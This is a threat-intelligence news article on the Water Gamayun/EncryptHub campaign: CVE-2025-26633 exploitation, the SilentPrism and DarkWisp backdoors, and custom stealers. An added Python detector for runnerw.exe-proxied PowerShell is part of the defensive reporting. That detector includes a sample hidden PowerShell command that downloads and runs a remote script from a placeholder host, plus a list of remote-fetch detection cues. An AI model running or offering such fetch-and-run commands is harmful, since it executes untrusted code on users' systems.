The threat actors behind the zero-day exploitation of a recently discovered security vulnerability in Microsoft Windows have been found to deploy two new backdoors called SilentPrism and DarkWisp.
The activity is attributed to a suspected Russian hacking group called Water Gamayun, also known as EncryptHub and LARVA-208.
Trend Micro researchers Aliakbar Zahravi and Ahmed Mohamed Ibrahim said in a follow-up analysis published last week, "The threat actor delivers payloads primarily by means of malicious provisioning packages, signed .msi files, and Windows MSC files, using techniques like the IntelliJ runnerw.exe for command execution."
Water Gamayun has been linked to the active exploitation of CVE-2025-26633 (aka MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC) framework that can be abused to execute malware through a rogue Microsoft Console (.msc) file.
The attack chains involve the use of provisioning packages (.ppkg), signed Microsoft Windows Installer files (.msi), and .msc files to deliver information stealers and backdoors that are capable of establishing persistence and exfiltrating data.
EncryptHub attracted attention towards the end of June 2024 after using a fake WinRAR website and the "encrypthub" name to push various kinds of malware families, including stealers, miners, and ransomware. The threat actors have since built out their own infrastructure for both staging and command-and-control (C&C) purposes.
The .msi installers used in the attacks masquerade as messaging and meeting software such as DingTalk, QQTalk, and VooV Meeting. They are designed to execute a PowerShell downloader, which is then used to fetch and run the next-stage payloads on the compromised host.
One such malware is a PowerShell implant dubbed SilentPrism that can establish persistence, execute multiple shell commands simultaneously, and maintain remote control, while also incorporating anti-analysis techniques. Another PowerShell backdoor of note is DarkWisp, which enables system reconnaissance, exfiltration of sensitive data, and persistence.
"Once the malware exfiltrates reconnaissance and system information to the C&C server, it enters a continuous loop," the researchers said. "The malware accepts commands via a TCP connection on port 8080, where commands arrive in a specific command format.
"The main communication loop ensures continuous interaction with the server, handling commands, maintaining connectivity, and transmitting the results securely."
The third payload deployed in the attacks is the MSC EvilTwin loader, which weaponizes CVE-2025-26633 to execute a malicious .msc file, ultimately leading to the deployment of the Rhadamanthys stealer. The loader is also designed to clean up the system to avoid leaving a forensic trail.
Rhadamanthys is far from the only stealer in Water Gamayun's arsenal, as the group has also been observed distributing another commodity stealer named StealC, as well as three custom PowerShell variants referred to as EncryptHub Stealer variant A, variant B, and variant C.
The bespoke stealer is a fully featured malware that can collect comprehensive system information, including details about antivirus software, installed software, network adapters, and running applications. It also extracts Wi-Fi passwords, Windows product keys, clipboard history, browser credentials, and session data from various messaging, VPN, FTP, and password management apps.
In addition, it specifically looks for files matching certain keywords and extensions, indicating a focus on collecting recovery phrases associated with cryptocurrency wallets.
"These variants demonstrate similar functionalities and capabilities, with only minor modifications differentiating them," the researchers said. "All the EncryptHub variants involved in this research are modified versions of the open-source Kematian Stealer."
One iteration of the EncryptHub Stealer is notable for its use of a new living-off-the-land binary (LOLBin) technique, in which the IntelliJ process launcher "runnerw.exe" is used to proxy the execution of a remote PowerShell script on the infected system.
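A defender-side illustration of the runnerw.exe proxying described above, added here as an example and not code from the original report: it runs a simple detection over constructed process-creation events (Sysmon-style field names are an assumption), flagging runnerw.exe as the parent of a PowerShell process while leaving legitimate IntelliJ child processes alone, and raising the severity when the command line carries a remote-fetch cue.

```python
# Constructed sample process-creation events (not real telemetry).
# Field names follow Sysmon Event ID 1 conventions; this is an assumption.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/a.ps1)"'},
    {"ParentImage": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "Image": r"C:\Program Files\Java\jdk\bin\java.exe",
     "CommandLine": "java -jar build.jar"},            # normal IDE usage, must not fire
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},         # PowerShell, but not via runnerw
]

# Substrings that suggest the script is pulled from a remote location or hidden
# behind encoding; list is illustrative, not exhaustive.
REMOTE_FETCH_CUES = ("invoke-webrequest", "iwr ", "downloadstring",
                     "net.webclient", "http://", "https://", "-enc", "-encodedcommand")

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def basename(path):
    """Return the file name of a Windows path, lower-cased."""
    return path.lower().rsplit("\\", 1)[-1]


def is_runnerw_proxied_powershell(event):
    """True when runnerw.exe is the direct parent of a PowerShell process."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    return parent == "runnerw.exe" and child in POWERSHELL_IMAGES


def has_remote_fetch_cue(command_line):
    cl = command_line.lower()
    return any(cue in cl for cue in REMOTE_FETCH_CUES)


def triage(events):
    """Return one finding per suspicious event, with a coarse severity."""
    findings = []
    for ev in events:
        if not is_runnerw_proxied_powershell(ev):
            continue
        cmd = ev.get("CommandLine", "")
        severity = "high" if has_remote_fetch_cue(cmd) else "medium"
        findings.append({"severity": severity, "command_line": cmd})
    return findings
```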
The stealer artifacts distributed through malicious MSI packages or binary malware droppers have also been found to propagate other malware families such as Lumma Stealer, Amadey, and clippers.
Further analysis of the threat actor's C&C infrastructure ("82.115.223[.]182") has uncovered the use of other PowerShell scripts to download and execute the AnyDesk software for remote access, as well as the ability for operators to send Base64-encoded remote commands to the victim machine.
"Water Gamayun's use of various delivery methods and techniques in its campaign, such as provisioning malicious payloads through signed Microsoft Installer files and leveraging LOLBins, highlights their adaptability in compromising victims' systems and data," Trend Micro said.
"Their intricately designed payloads and C&C infrastructure enable the threat actor to maintain persistence, dynamically control infected systems, and obfuscate their activities."